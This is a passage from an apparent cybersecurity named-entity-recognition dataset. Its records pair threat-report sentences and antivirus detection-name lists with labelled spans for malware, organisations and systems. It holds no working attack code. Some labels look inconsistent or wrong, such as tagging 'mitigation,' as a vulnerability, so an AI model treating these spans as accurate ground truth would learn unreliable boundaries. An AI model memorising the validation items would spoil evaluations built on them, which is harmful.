Android.Trojan.Locker.ck Other:Android.Reputation.2 HEUR:Trojan-Ransom.AndroidOS.Small.k Trojan.RansomKD.12603969 Trojan.Android.Ransom.dgshfp Trojan.RansomKD.12603969 Android.Locker.534.origin ANDROID/Locker.xdjbu Android/Locker.B!tr Trojan[Ransom]/Android.Small Troj.Ransom.Androidos!c HEUR:Trojan-Ransom.AndroidOS.Small.k Android-Trojan/Slocker.9140 Trojan.Android.Small.a 
Trojan-Ransom.AndroidOS.TestLocker Trojan.RansomKD.12603969", "spans": {"Malware: backdoor": [[2, 10]]}, "info": {"id": "cyner2_valid_001542", "source": "cyner2_valid"}} {"text": "Instead of using an exploit kit, malicious actors have uploaded a rogue Flash ad which further launches another Flash file containing the zero-day exploit.", "spans": {"Malware: exploit kit,": [[20, 32]], "System: Flash": [[112, 117]], "Malware: zero-day exploit.": [[138, 155]]}, "info": {"id": "cyner2_valid_001543", "source": "cyner2_valid"}} {"text": "A backdoor also known as: Trojan.StartPage Win32.Trojan.WisdomEyes.16070401.9500.9940 W32/Trojan.HZDE-8958 TROJ_FAM60b.TOMA Win.Trojan.Startpage-651 Trojan.Win32.StartPage.efiqrm Trojan.Shutdowner.Win32.1900 TROJ_FAM60b.TOMA Trojan.Krotten W32/Trojan.HJL Trojan/StartPage.acu W32.Trojan.Sapade TR/StartPage.EQ Trojan/Win32.StartPage Win32.Troj.Small.bv.kcloud Trojan.Win32.A.Krotten.28672 Trojan/Win32.Xema.C86135 Trojan.StartPage Trojan.Sapade!olqJKeKIABg", "spans": {"Malware: backdoor": [[2, 10]]}, "info": {"id": "cyner2_valid_001544", "source": "cyner2_valid"}} {"text": "While preparing the materials for my upcoming HITBAMS2016 talk on Kernel Exploit hunting and mitigation, I came across this new variant of Dridex SHA1: 455817A04F9D0A7094038D006518C85BE3892C99, which is rather interesting.", "spans": {"Organization: HITBAMS2016": [[46, 57]], "Vulnerability: Kernel Exploit hunting": [[66, 88]], "Vulnerability: mitigation,": [[93, 104]], "Malware: variant": [[128, 135]], "Malware: Dridex": [[139, 145]]}, "info": {"id": "cyner2_valid_001545", "source": "cyner2_valid"}} {"text": "A backdoor also known as: Trojan-Dropper.Win32.Small!O Troj.Dropper.W32.Small!c W32/Downloader.QAVP-1383 Win32/DVOverride.D Trojan-Dropper.Win32.Small.ajq Trojan.Win32.Darpa.vyklv Trojan.Overture W32/DldrX.IZO TrojanDropper.Small.gkq TR/Dldr.Darpa.D Trojan[Downloader]/Win32.Darpa TrojanDownloader:Win32/Darpa.D Trojan-Dropper.Win32.Small.ajq Dropper/Win32.Small.R65066 
TrojanDownloader.Darpa Trj/CI.A Win32/TrojanDownloader.Darpa.D Win32.Trojan-dropper.Small.Taex Trojan-Downloader.Win32.Darpa.d W32/Darpa.C!tr Win32/Trojan.Downloader.86e", "spans": {"Malware: backdoor": [[2, 10]]}, "info": {"id": "cyner2_valid_001546", "source": "cyner2_valid"}} {"text": "Two months prior, ITG03 also created another malware JMT Trader and a fake website offering cryptocurrency trading platform.", "spans": {"Malware: malware JMT Trader": [[45, 63]], "Organization: cryptocurrency trading platform.": [[92, 124]]}, "info": {"id": "cyner2_valid_001547", "source": "cyner2_valid"}} {"text": "A backdoor also known as: Win32.Trojan.WisdomEyes.16070401.9500.9996 Trojan.Win32.TZ.dkkhen W32.Email.Worm.Silly Trojan.Barys.D8DA TrojanSpy:MSIL/Blanajog.A Trojan-PWS.MSIL", "spans": {"Malware: backdoor": [[2, 10]]}, "info": {"id": "cyner2_valid_001548", "source": "cyner2_valid"}} {"text": "From governmental networks to corporations, it is possible to find almost anything on xDedic for as little as 6 USD per server.", "spans": {"Organization: governmental networks": [[5, 26]], "Organization: corporations,": [[30, 43]], "System: server.": [[120, 127]]}, "info": {"id": "cyner2_valid_001549", "source": "cyner2_valid"}} {"text": "A backdoor also known as: Email-Worm.Win32.Warezov!O HackTool.Patcher Win32.Trojan.WisdomEyes.16070401.9500.9984 W32.Stration@mm Win32/Stration.AIP TROJ_STRAT.JD Win.Worm.Strationpac-2 Email-Worm.Win32.Warezov.pk Troj.W32.VB.kZhv TrojWare.Win32.GameThief.Nilage.~CRSA Win32.HLLM.Limar TROJ_STRAT.JD W32/Stration.dr Worm.Warezov.cu Email-Worm.Win32.Warezov.pk W32/Stration.dr Worm.Warezov Win32.Warezov W32/Stration.JQ@mm Win32/Worm.Email-Worm.10b", "spans": {"Malware: backdoor": [[2, 10]]}, "info": {"id": "cyner2_valid_001550", "source": "cyner2_valid"}} {"text": "A backdoor also known as: W32.eHeur.Malware11 Trojan.KillAV Trojan/Delf.obb TSPY_HUPIGON_BL130363.TOMC Win32.Trojan.WisdomEyes.16070401.9500.9835 Backdoor.Graybird 
TSPY_HUPIGON_BL130363.TOMC Win.Trojan.Killav-107 Backdoor.Win32.Defsel.dd Trojan.Win32.Paper.bciflq Trojan.Win32.Z.Hupigon.1612192 BackDoor.Paper.28 BehavesLike.Win32.TrojanShifu.tc Trojan-GameThief.Win32.Magania Backdoor:Win32/Defsel.B Backdoor.Win32.Defsel.dd Trj/CI.A Win32/Delf.OMY Win32.Backdoor.Defsel.Swkf", "spans": {"Malware: backdoor": [[2, 10]]}, "info": {"id": "cyner2_valid_001551", "source": "cyner2_valid"}} {"text": "SpyNote RAT captured the device ’ s screen activities along with audio using the MediaProjectionCallback functionality ( available with Lollipop , the Android 5.0 release , and later ) and saved the output in a file named \" video.mp4 '' as shown in the following screenshot SMS stealing SpyNote RAT was also observed stealing SMS messages from the affected devices , as shown in screenshot below : Stealing contacts The ability to steal contacts is a favorite feature for spyware developers , as the stolen contacts can be used to further spread the spyware .", "spans": {"Malware: SpyNote RAT": [[0, 11], [287, 298]], "System: Lollipop": [[136, 144]], "System: Android 5.0": [[151, 162]]}, "info": {"id": "cyner2_valid_001552", "source": "cyner2_valid"}} {"text": "A backdoor also known as: Win32.Trojan.WisdomEyes.16070401.9500.9893 W32/Trojan.ZFVJ-5939 Trojan.Win32.Z.Injector.774656.W Tool.PassView.566 BehavesLike.Win32.Downloader.bc Trojan.MSIL.Crypt TrojanDropper.Demp.kq Trojan/Win32.Bublik Trojan.MSIL.Krypt.2 HackTool:MSIL/Cryptorstub.E Dropper/Win32.Injector.R28775 TrojanDropper.Demp Trj/CI.A MSIL/Injector.ADS Trojan.DR.Demp!46IpNyNSBE8 Win32/Trojan.d60", "spans": {"Malware: backdoor": [[2, 10]]}, "info": {"id": "cyner2_valid_001553", "source": "cyner2_valid"}} {"text": "We were notified of a new ransomware version last night.", "spans": {"Malware: new ransomware": [[22, 36]]}, "info": {"id": "cyner2_valid_001555", "source": "cyner2_valid"}} {"text": "Sysdig's threat research team recently reported on a fascinating client engagement they 
conducted, in response to a sophisticated cloud attack resulting in the loss of proprietary data.", "spans": {"Organization: Sysdig's threat research team": [[0, 29]]}, "info": {"id": "cyner2_valid_001556", "source": "cyner2_valid"}} {"text": "The best example of that is that it does n't take advantage of the accessibility framework , collecting information on non-rooted devices .", "spans": {}, "info": {"id": "cyner2_valid_001557", "source": "cyner2_valid"}} {"text": "During this operation, Mandiant observed UNC2970 leverage three new code families: TOUCHMOVE, SIDESHOW, and TOUCHSHIFT.", "spans": {"Malware: families: TOUCHMOVE, SIDESHOW,": [[73, 103]], "Malware: TOUCHSHIFT.": [[108, 119]]}, "info": {"id": "cyner2_valid_001558", "source": "cyner2_valid"}} {"text": "Talos recently observed a new campaign specific to South America, namely Brazil.", "spans": {"Organization: Talos": [[0, 5]]}, "info": {"id": "cyner2_valid_001559", "source": "cyner2_valid"}} {"text": "POS malware target retail companies in an attempt to steal customer payment details, such as credit card information.", "spans": {"Malware: POS malware": [[0, 11]], "Organization: retail companies": [[19, 35]]}, "info": {"id": "cyner2_valid_001560", "source": "cyner2_valid"}} {"text": "A backdoor also known as: W32.OnGameWY0DL.Trojan Trojan.Win32.Shiz.3!O Trojan.SimdaCS.S15592 Backdoor.Shiz.Win32.2165 Backdoor/Shiz.bpdh Trojan.Kazy.DDBCC Win32.Trojan.WisdomEyes.16070401.9500.9999 W32/Shiz.JRPD-2156 TROJ_SHIZ.SMP6 Win.Trojan.Shiz-2126 Trojan.Win32.Shiz.rqosk TrojWare.Win32.Simda.U Trojan.Packed.20771 TROJ_SHIZ.SMP6 W32/Shiz.DZ Backdoor/Shiz.bse Trojan[Backdoor]/Win32.Shiz Win32.Hack.Shiz.kcloud Trojan:Win32/Simda.U Backdoor.Win32.A.Shiz.290304.A Backdoor/Win32.Shiz.R23510 BScope.TrojanPSW.IBank.1512 Win32/Spy.Shiz.NCF Backdoor.Shiz!a8qwzfHsJPs Trojan.Win32.Simda", "spans": {"Malware: backdoor": [[2, 10]]}, "info": {"id": "cyner2_valid_001561", "source": "cyner2_valid"}} {"text": "DualToy is still active and 
we have detected over 8,000 unique samples belonging to this Trojan family to date .", "spans": {"Malware: DualToy": [[0, 7]]}, "info": {"id": "cyner2_valid_001562", "source": "cyner2_valid"}} {"text": "These changes include : Removing the SYSTEM_ALERT_WINDOW error and alert window types , and introducing a few other types as replacement Elevating the permission status of SYSTEM_ALERT_WINDOW to special permission by putting it into the “ above dangerous ” category , which means that users have to go through many screens to approve apps that ask for permission , instead of just one click Introducing an overlay kill switch on Android 8.0 and later that users can activate anytime to deactivate a system alert window To adapt , Android malware evolved to misusing other features , but these aren ’ t as effective .", "spans": {"System: Android 8.0": [[429, 440]], "System: Android": [[530, 537]]}, "info": {"id": "cyner2_valid_001563", "source": "cyner2_valid"}} {"text": "A backdoor also known as: Trojan.Multi Win.Trojan.Dealply-6391261-0 Uds.Dangerousobject.Multi!c BehavesLike.Win32.BadFile.gh W32/Trojan.CFOO-7699 TR/RedCap.nbeft Trj/GdSda.A Win32.Trojan.Virus.Dvpq Trojan-Downloader.Win32.Stegano Malicious_Behavior.SB", "spans": {"Malware: backdoor": [[2, 10]]}, "info": {"id": "cyner2_valid_001564", "source": "cyner2_valid"}} {"text": "The group has a relatively small footprint compared to massive operations such as Equation", "spans": {}, "info": {"id": "cyner2_valid_001565", "source": "cyner2_valid"}} {"text": "It protects itself from deletion by requesting Device Administrator rights during the installation .", "spans": {}, "info": {"id": "cyner2_valid_001566", "source": "cyner2_valid"}} {"text": "A backdoor also known as: PUA.Packed.ASPack Heur.Packed.Unknown Trojan.DownLoad1.57494 TR/Dldr.Diptwond.A.14 TrojanDownloader.Delf.zql TrojanDownloader:Win32/Diptwond.A", "spans": {"Malware: backdoor": [[2, 10]]}, "info": {"id": "cyner2_valid_001567", "source": 
"cyner2_valid"}} {"text": "Further analysis of the iOS app “ Concipit1248 ” showed that the server used , spy [ .", "spans": {}, "info": {"id": "cyner2_valid_001568", "source": "cyner2_valid"}} {"text": "In this report we track a malware operation targeting members of the Tibetan Parliament over August and October 2016.", "spans": {"Organization: the Tibetan Parliament": [[65, 87]]}, "info": {"id": "cyner2_valid_001569", "source": "cyner2_valid"}} {"text": "The method, which involves modifying the login pages to Cisco Clientless SSL VPNs Web VPN, is both novel and surprisingly obvious at the same time.", "spans": {"Organization: Cisco": [[56, 61]]}, "info": {"id": "cyner2_valid_001570", "source": "cyner2_valid"}} {"text": "A backdoor also known as: Trojan.Win32.Jorik.IRCbot!O Troj.W32.Jorik.IRCbot.to6R Win32.Trojan.WisdomEyes.16070401.9500.9999 W32.IRCBot Trojan.Injector.AAKX Trojan.Win32.Jorik.IRCbot.vyi Trojan.Win32.Jorik.cqmskq Backdoor.Win32.IRCBot.TR Win32.HLLW.Autoruner1.31471 BehavesLike.Win32.Virut.cc Trojan/Jorik.gftf W32/Injector.AAKX!tr Trojan/Win32.IRCbot Win32.Virut.xj.36864 Backdoor:Win32/IRCBot.TA Trojan.Win32.Jorik.IRCbot.vyi Trojan/Win32.IRCBot.R93145 Malware-Cryptor.Limpopo Trojan.Zusy.D117BF Trojan.Win32.Jorik", "spans": {"Malware: backdoor": [[2, 10]]}, "info": {"id": "cyner2_valid_001571", "source": "cyner2_valid"}} {"text": "After it is launched , GolfSpy will generate a unique ID for the affected device and then collect its data such as SMS , contact list , location , and accounts in this format : “ % , [ ] , time ” ( shown in Figure 4 ) .", "spans": {"Malware: GolfSpy": [[23, 30]]}, "info": {"id": "cyner2_valid_001572", "source": "cyner2_valid"}} {"text": "A backdoor also known as: Msil.Backdoor.Spygate.Pjdq W32/Trojan3.ADEP Backdoor.MSIL.SpyGate.tjz Trojan.Win32.Bladabindi.evcqxh Trojan.PWS.Stealer.19879 BehavesLike.Win32.Trojan.hh W32/Trojan.YLSB-2921 DR/Delphi.qahzy Trojan/Win32.APosT Trojan:Win32/Omkerer.A Trojan.Strictor.D24FE1 
Backdoor.MSIL.SpyGate.tjz Trojan/Win32.Delphipad.R213614 Backdoor.MSIL.Cardinal Trojan-Spy.Fareit", "spans": {"Malware: backdoor": [[2, 10]]}, "info": {"id": "cyner2_valid_001573", "source": "cyner2_valid"}} {"text": "Affected organizations are in the manufacturing, finance, construction, agriculture, marketing and high technology industries.", "spans": {"Organization: organizations": [[9, 22]], "Organization: the manufacturing, finance, construction, agriculture, marketing": [[30, 94]], "Organization: high technology industries.": [[99, 126]]}, "info": {"id": "cyner2_valid_001574", "source": "cyner2_valid"}} {"text": "For example , some strains of ransomware abuse accessibility features , a method that could easily alarm users because accessibility is a special permission that requires users to go through several screens and accept a warning that the app will be able to monitor activity via accessibility services .", "spans": {}, "info": {"id": "cyner2_valid_001575", "source": "cyner2_valid"}} {"text": "A backdoor also known as: W32.ZarboteAN.Trojan Trojan/Werapal.a Win32.Trojan.WisdomEyes.16070401.9500.9999 Trojan.Win32.Gootkit.rjnxs Trojan.Win32.Z.Werapal.45440 W32.Virut.lGNe BackDoor.Gootkit.86 Trojan.Werapal.Win32.2 BehavesLike.Win32.PWSZbot.pc Trojan.Win32.Malex TR/Otlard.kpgws Trojan:WinNT/Otlard.I Backdoor.Gootkit.9213 Trj/CI.A Win32/Werapal.A Trojan.Werapal!ZPKXwJL7K3Q W32/Werapal.A!tr", "spans": {"Malware: backdoor": [[2, 10]]}, "info": {"id": "cyner2_valid_001576", "source": "cyner2_valid"}} {"text": "Prosecutors in this case have alleged that Odatv journalists and others were members of the Ergenekon terrorist organization, based on documents recovered from two particular computers.", "spans": {"Organization: Prosecutors": [[0, 11]], "Organization: Odatv journalists": [[43, 60]], "System: computers.": [[175, 185]]}, "info": {"id": "cyner2_valid_001577", "source": "cyner2_valid"}} {"text": "A backdoor also known as: Trojan.Vbato 
Win32.Trojan.WisdomEyes.16070401.9500.9948 Win.Trojan.Dropper-6218 Trojan-Dropper.Win32.Sysn.chwu Trojan.Win32.MalwareF.cxdlob Trojan.Win32.Z.Dropper.2029056 Trojan.DownLoader11.20864 W32/Trojan.TFDR-2768 Trojan/Win32.Unknown Trojan:MSIL/Vbato.A Trojan-Dropper.Win32.Sysn.chwu TrojanDropper.Sysn Win32.Trojan-dropper.Sysn.Lqev Win32/Trojan.d60", "spans": {"Malware: backdoor": [[2, 10]]}, "info": {"id": "cyner2_valid_001578", "source": "cyner2_valid"}} {"text": "A backdoor also known as: Trojan.Kazy.D293D9 Win32.Trojan.WisdomEyes.16070401.9500.9999 Trojan.Win32.Hesv.cjzv Trojan.DownLoader10.18059 W32/Trojan.VGFO-2830 TR/Spy.MSIL.KeyLogger.wrh Trojan:Win32/Polerter.A Trojan.Win32.Hesv.cjzv HEUR/Fakon.mwf Msil.Trojan-spy.Keylogger.Wptp W32/KeyLogger.WRH!tr Win32/Trojan.9f9", "spans": {"Malware: backdoor": [[2, 10]]}, "info": {"id": "cyner2_valid_001579", "source": "cyner2_valid"}} {"text": "A backdoor also known as: TROJ_LAMEWAR.VTG Win32.Trojan.WisdomEyes.16070401.9500.9919 TROJ_LAMEWAR.VTG Trojan.Win32.Ixeshe.i Trojan.DownLoad2.15058 W32/PdfExDr.B!tr Trojan.Win32.Ixeshe.i Backdoor:Win32/Ixeshe.A Trojan/Win32.Xema.C77207 Trojan-Downloader.Dreamtouch.xb Trojan-PWS.Win32.Small", "spans": {"Malware: backdoor": [[2, 10]]}, "info": {"id": "cyner2_valid_001580", "source": "cyner2_valid"}} {"text": "A backdoor also known as: Trojan.Bedep Backdoor.Win32.Bedep.fzo Trojan:W64/Bedep.F TR/Crypt.ZPACK.youka Trojan[Backdoor]/Win32.Bedep.fzo Backdoor.Win32.Bedep.fzo Trojan/Win64.Bedep.C996811 Bck/Bedep.D Trojan.Win64.Crypt", "spans": {"Malware: backdoor": [[2, 10]]}, "info": {"id": "cyner2_valid_001581", "source": "cyner2_valid"}} {"text": "Once Petya executes, the user's machine will crash, restart, and show a skull-and-crossbones animation before displaying a ransom note asking for payment in bitcoin BTC in order to decrypt the system.", "spans": {"Malware: Petya": [[5, 10]], "System: user's machine": [[25, 39]]}, "info": {"id": "cyner2_valid_001582", "source": "cyner2_valid"}} 
{"text": "Never click on unknown links received through ads , SMS messages , emails , or the like .", "spans": {}, "info": {"id": "cyner2_valid_001584", "source": "cyner2_valid"}} {"text": "A backdoor also known as: Trojan.Skeeyah.FC.3322 Trojan.Zusy.D3786C W32.Styes Trojan.MulDrop7.21252 Dropper.Dapato.Win32.30641 Trojan[Dropper]/Win32.Dapato TrojanDropper.Dapato Trj/GdSda.A", "spans": {"Malware: backdoor": [[2, 10]]}, "info": {"id": "cyner2_valid_001585", "source": "cyner2_valid"}} {"text": "A backdoor also known as: Trojan/Dropper.Cadro.exx Trojan.DownLoader7.22452 Adware.WSearch.Win32.366 Trojan-Dropper.Win32.Cadro TrojanDropper.Cadro.at TrojanDropper:Win32/Blathla.A Dropper/Win32.Cadro.C63112 TrojanDropper.Cadro Adware.WSearch!C6bq3esdNs4", "spans": {"Malware: backdoor": [[2, 10]]}, "info": {"id": "cyner2_valid_001587", "source": "cyner2_valid"}} {"text": "A backdoor also known as: W32.OngamesSC.Trojan Trojan.Spy.Delf.NNO Trojan-GameThief.Win32.OnLineGames!O Trojan.Storark.A PWS-OnlineGames.i Trojan.OnLineGames.Win32.13 Trojan/PSW.OnLineGames.jaf Trojan.Spy.Delf.NNO Win32.Trojan-PSW.OLGames.f W32/Trojan2.SQV Infostealer.Gampass TSPY_ONLINEG.OWS Win.Spyware.16287-1 Trojan.Spy.Delf.NNO Trojan.Spy.Delf.NNO Trojan.Win32.OnLineGames.bdecde Trojan.Win32.PSWIGames.24914 Troj.PSW32.W.OnLineGames.l2tm Trojan.Spy.Delf.NNO TrojWare.Win32.PSW.OnLineGames.FDY Trojan.PWS.Wsgame.6334 TSPY_ONLINEG.OWS PWS-OnlineGames.i Virus.Win32.OnLineGames.EAT W32/Trojan2.SQV Trojan/PSW.OnLineGames.mit Trojan[GameThief]/Win32.OnLineGames.sqkg Win32.Troj.OnlineGamesT.yy.26978 Trojan:Win32/Storark.A Trojan/Win32.OnlineGameHack.R1315 Trojan.Spy.Delf.NNO OScope.PSW.Game.1E56 Win32/PSW.OnLineGames.FDY Trojan.Win32.Delf.nn Trojan.PWS.OnLineGames!uorKl+THko0", "spans": {"Malware: backdoor": [[2, 10]]}, "info": {"id": "cyner2_valid_001589", "source": "cyner2_valid"}} {"text": "Customers have to send a set text message from their phone to a specific bank number .", "spans": {}, "info": {"id": 
"cyner2_valid_001590", "source": "cyner2_valid"}} {"text": "A backdoor also known as: Worm/W32.Mytob.6050 W32/Mytob.f Win32.Trojan.WisdomEyes.16070401.9500.9996 W32/Mytob.QLWB-0952 W32.Mytob.L@mm WORM_MYTOB.J Win.Worm.Mytob-9 Net-Worm.Win32.Mytob.f Trojan.Win32.Mytob.enhl Worm.Win32.Mytob.C W32.W.Mytob.f!c Worm.Win32.Mytob.I Win32.HLLM.MyDoom.506 Worm.Mytob.Win32.16 WORM_MYTOB.J BehavesLike.Win32.VBObfus.zh Worm.Win32.Hellim W32/Mytob.X Net-Worm.Mytob.o W32.Trojan.Worm-Mytob WORM/Mytob.f.2 Worm[Net]/Win32.Mytob Worm.Mytob.f.kcloud Trojan.Heur.VP.aifda8T6Gxei Net-Worm.Win32.Mytob.f Worm:Win32/Hellim.B Worm/Win32.Mytob.C21155 Net-Worm.Mytob Win32/Mytob.I Win32.Worm-net.Mytob.Sunx I-Worm.Mytob.I W32/Mytob.L@mm", "spans": {"Malware: backdoor": [[2, 10]]}, "info": {"id": "cyner2_valid_001591", "source": "cyner2_valid"}} {"text": "A backdoor also known as: W32.Pinfi.B Win32.Parite.B Virus/W32.Parite.C Virus.Win32.Parite.b!O W32.Perite.A W32/Pate.b Virus.Parite.Win32.9 Troj.GameThief.W32.OnLineGames.lgN3 W32/Pate.B PE_PARITE.A Win32.Virus.Parite.d W32/Trojan.HNLC-4836 W32.Fidameg.A Win32/Pinfi.A PE_PARITE.A Virus.Win32.Parite.b Win32.Parite.B Virus.Win32.Parite.bgvo Virus.Win32.Hala.aeg Win32.Parite.B Win32.Parite.B Win32.Parite.2 BehavesLike.Win32.Miuref.hc W32/Trojan2.GKMR Win32/Parite.b Virus/Win32.Parite.c Win32.Parite.b.5756 Win32.Parite.B Win32.Parite.A Virus.Win32.Parite.b Win32.Parite.B Win32.Parite.B Virus.Win32.Parite.b Win32.Parite.B Win32/Parite.B Win32.Parite.B W32.Vetor W32/Parite.B Virus.Win32.Parite.H", "spans": {"Malware: backdoor": [[2, 10]]}, "info": {"id": "cyner2_valid_001593", "source": "cyner2_valid"}} {"text": "A backdoor also known as: Backdoor.Delf!9ELE8bDqlms W32/Delf.DKOT Win32/Refpron.BC TROJ_DELF.OLK Backdoor.Win32.Delf.ohi Backdoor.Win32.Delf.~VP TROJ_DELF.OLK Backdoor.Win32.Refpron!IK Backdoor/Delf.klk Backdoor:Win32/Refpron.M Backdoor.Win32.Refpron.180224 Win-Trojan/Xema.176640.C Virus.Win32.Heur.i SScope.Trojan-Downloader.074 
Backdoor.Win32.Refpron W32/Koblu.A!tr Downloader.BHO.W Trj/Refpron.C", "spans": {"Malware: backdoor": [[2, 10]]}, "info": {"id": "cyner2_valid_001595", "source": "cyner2_valid"}} {"text": "A backdoor also known as: Backdoor.Cmjspy.31 Backdoor/W32.Cmjspy.2597376 Backdoor.Cmjspy.31 Backdoor.Cmjspy.31 Win32.Trojan.WisdomEyes.151026.9950.9977 W32/Risk.VITA-2915 Backdoor.MLink Backdoor.Win32.Cmjspy.31 Trojan.Win32.Cmjspy.bafdj Backdoor.Cmjspy.31 Backdoor.Win32.Cmjspy.31 Backdoor.Cmjspy.31 BackDoor.CmjSpy.116 Backdoor.Cmjspy.Win32.245 BehavesLike.Win32.Trojan.vh Backdoor/Cmjspy.ad BDS/Cmjspy.530.1 W32/BackDoor.31!tr.bdr Trojan[Backdoor]/Win32.Cmjspy Win32.Hack.Cmjspy.kcloud Backdoor.Cmjspy.31 Backdoor.W32.Cmjspy.31!c Backdoor:Win32/Cmjspy.AJ Backdoor.CmjSpy Win32.Backdoor.Cmjspy.Phhc Backdoor.Cmjspy!Mjpi0d5knCA Backdoor.Win32.Cmjspy Backdoor.Cmjspy.31 BackDoor.CmjSpy.3.B Backdoor.Win32.Cmjspy.AUx", "spans": {"Malware: backdoor": [[2, 10]]}, "info": {"id": "cyner2_valid_001596", "source": "cyner2_valid"}} {"text": "A backdoor also known as: W32.FamVT.SytroA.Worm Worm/W32.Sytro.64848 P2P-Worm.Win32.Sytro!O Worm.Soltern.A.mue Worm.Sytro.Win32.5 Worm.Systro Trojan/Sytro.o W32/Sytro.MJTQ-1159 W32.HLLW.Electron Win32/HLLW.Electron.P WORM_SYTRO.O Win.Worm.Sytro-22 P2P-Worm.Win32.Sytro.o Trojan.Win32.Sytro.culaoe Worm.Win32.Sytro.b Worm.Win32.Sytro.O Win32.HLLW.Sytro WORM_SYTRO.O BehavesLike.Win32.Sytro.kc Virus.Win32.Sytro W32/Sytro.O@p2p Worm/Sytro.y WORM/Systro.O Worm[P2P]/Win32.Sytro.o Worm.Sytro.j.kcloud Worm:Win32/Soltern.L Worm.Win32.P2P-Sytro.56832.B P2P-Worm.Win32.Sytro.o Trojan/Win32.HDC.C1392 Worm.Sytro Worm.Sytro Win32/Sytro.O Worm.P2P.Sytro!ArVeGXL0zNc Worm.Win32.Systro.A", "spans": {"Malware: backdoor": [[2, 10]]}, "info": {"id": "cyner2_valid_001597", "source": "cyner2_valid"}} {"text": "A backdoor also known as: Trojan.Tiniwen W64/Trojan.CJAU-4289 Trojan.Feratuser Trojan.Win32.SelfDel.cdyv Win32.Trojan.Selfdel.Eckt Trojan.SelfDel.Win32.53691 Trojan.Win64.Tiniwen 
Trojan.Selfdel.cbj Trojan/Win32.SelfDel Trojan.Win32.SelfDel.cdyv Trojan:Win64/Tiniwen.A W32/SelfDel.CDYV!tr Trj/CI.A", "spans": {"Malware: backdoor": [[2, 10]]}, "info": {"id": "cyner2_valid_001598", "source": "cyner2_valid"}} {"text": "A backdoor also known as: Trojan-PWS/W32.Maha.129024.B TrojanPWS.Maha Trojan/PSW.Maha.a HKTL_MAHA.A Win32.Trojan.WisdomEyes.16070401.9500.9897 W32/PWStealer.DK HKTL_MAHA.A Win.Trojan.Maha-2 Trojan-PSW.Win32.Maha.a Trojan.Win32.Maha.wirwd Dropper.PSWMah.129024 Troj.PSW32.W.Maha.a!c BackDoor.Pigeon1.13178 Trojan.Maha.Win32.26 BehavesLike.Win32.Wabot.ch W32/PWS.OVKW-7043 Trojan/PSW.Maha.a TR/PSW.Maha.a.38.B Trojan[PSW]/Win32.Maha PWS:Win32/Maha.A Trojan-PSW.Win32.Maha.a TrojanPSW.Maha Trj/RoboMaya.A Win32/PSW.Maha.A Win32.Trojan-qqpass.Qqrob.Ednc Trojan-Dropper.Delf W32/Maha.E!tr.pws", "spans": {"Malware: backdoor": [[2, 10]]}, "info": {"id": "cyner2_valid_001599", "source": "cyner2_valid"}} {"text": "Proofpoint researchers have uncovered a new technique of attachment-based delivery.", "spans": {"Organization: Proofpoint researchers": [[0, 22]]}, "info": {"id": "cyner2_valid_001600", "source": "cyner2_valid"}} {"text": "A backdoor also known as: Exploit.BypassUAC W32/Trojan.WGJS-0083 TROJ_SPNR.2BH514 Win.Tool.Win7Elevate-1 Exploit.Win32.BypassUAC.bk Win32.Exploit.Bypassuac.Pefl ApplicUnsaf.Win32.Win7Elevate Tool.Win7Elevate.Win32.2 TROJ_SPNR.2BH514 Backdoor.Win32.IRCBot Exploit.BypassUAC.o HackTool:Welevate.A Trojan/Win32.Kargatroj HackTool:Win32/Welevate.A Exploit.Win32.BypassUAC.bk HackTool/Win32.Win7Elevate.R27567 Exploit.BypassUAC Trj/CI.A HackTool.Welevate!WiPtbUu7pX0 Win32/Trojan.Multi.daf", "spans": {"Malware: backdoor": [[2, 10]]}, "info": {"id": "cyner2_valid_001601", "source": "cyner2_valid"}} {"text": "Readers should carefully think through the risks before changing this default setting .", "spans": {}, "info": {"id": "cyner2_valid_001602", "source": "cyner2_valid"}} {"text": "A backdoor also known as: Trojan.MulDrop3.28906 
TR/Rogue.7429039 W32/Grp.IE!tr Backdoor/Win32.Etso Trj/CI.A Trojan.Rogue Win32/Trojan.Multi.daf", "spans": {"Malware: backdoor": [[2, 10]]}, "info": {"id": "cyner2_valid_001603", "source": "cyner2_valid"}} {"text": "This section will contain a fake export table mimicking the same export table of the original system DLL chosen .", "spans": {}, "info": {"id": "cyner2_valid_001604", "source": "cyner2_valid"}} {"text": "While other families such as Zeus and Citadel are widely adopted by attackers targeting banking websites around the world, Retefe is consistently used to target victims in Sweden, Switzerland and Japan.", "spans": {"Malware: families": [[12, 20]], "Malware: Zeus": [[29, 33]], "Malware: Citadel": [[38, 45]], "Organization: banking websites": [[88, 104]], "Malware: Retefe": [[123, 129]]}, "info": {"id": "cyner2_valid_001605", "source": "cyner2_valid"}} {"text": "Dripion is custom-built, designed to steal information, and has been used sparingly in a limited number of targeted attacks.", "spans": {"Malware: Dripion": [[0, 7]]}, "info": {"id": "cyner2_valid_001606", "source": "cyner2_valid"}} {"text": "Since not much is known about its internals, we decided to take a closer look.", "spans": {}, "info": {"id": "cyner2_valid_001607", "source": "cyner2_valid"}} {"text": "With a bit of luck , we managed to find logs in which the evidence showed “ Agent Smith ’ s C & C front end routinely distributes a workload between “ w.h * * * g.com ” and “ tt.a * * * d.net ” .", "spans": {"Malware: Agent Smith": [[76, 87]]}, "info": {"id": "cyner2_valid_001608", "source": "cyner2_valid"}} {"text": "The classes.dex has implementation for only two classes : The main application class gCHotRrgEruDv , which is involved when the application opens A helper class that has definition for custom encryption and decryption This means that there ’ s no code corresponding to the services declared in the manifest file : Main Activity , Broadcast Receivers , and Background .", "spans": 
{}, "info": {"id": "cyner2_valid_001609", "source": "cyner2_valid"}} {"text": "The Trojan is distributed in Russia and CIS countries .", "spans": {}, "info": {"id": "cyner2_valid_001610", "source": "cyner2_valid"}} {"text": "This is a common technique used by malware developers to bundle the main payload inside the Android package to avoid easy detection .", "spans": {"System: Android": [[92, 99]]}, "info": {"id": "cyner2_valid_001611", "source": "cyner2_valid"}} {"text": "Recently, the Carbon Black Threat Research Team was alerted about such an attack by a partner's incident response IR team.", "spans": {"Organization: incident response IR team.": [[96, 122]]}, "info": {"id": "cyner2_valid_001612", "source": "cyner2_valid"}} {"text": "A backdoor also known as: Trojan-Downloader.Win32.VB!O Trojan.VBKrypt TSPY_BANKER.SMUC Win32.Trojan.WisdomEyes.16070401.9500.9952 TSPY_BANKER.SMUC Win.Trojan.Ag-1 Trojan.Win32.VBKrypt.yunu Trojan.Win32.VBKrypt.exnccu Trojan.Win32.Z.Banker.22528 TrojWare.Win32.TrojanDownloader.VB.PQZ Trojan.DownLoad3.4841 BehavesLike.Win32.Fake.mh Backdoor:Win32/Hostposer.A Trojan.Heur.bmKfrHFVJwji2 Trojan.Win32.VBKrypt.yunu 